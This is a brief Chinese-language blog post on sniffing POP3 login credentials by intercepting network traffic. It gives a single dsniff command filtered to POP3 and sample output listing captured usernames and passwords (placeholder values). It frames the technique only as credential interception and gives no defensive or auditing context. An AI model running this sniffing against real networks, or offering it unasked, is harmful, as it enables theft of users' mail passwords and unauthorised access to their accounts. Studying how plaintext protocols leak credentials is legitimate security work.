通过拦截用户命令嗅探POP3身份验证

Hujiuxiang 2019-08-23 ・1 分钟阅读

#shell脚本 #拦截 #用户 #命令

通过拦截用户命令嗅探POP3身份验证

dsniff -i any 'tcp port pop3'

DSNIFF是一个通用的密码嗅探器，它处理许多不同的协议，但是，它也处理TCP风格的表达式来限制分析的流量-所以，我可以限制它只在POP3上工作，

示例输出

dsniff: listening on any [tcp port pop3]
-----------------
11/18/10 10:41:01 tcp xxx.48323 -> remote.host.110 (pop3)
USER user1
PASS pass-for-user1
-----------------
11/18/10 10:41:28 tcp xxx.48321 -> other.host.110 (pop3)
USER user2
PASS pass-for-user2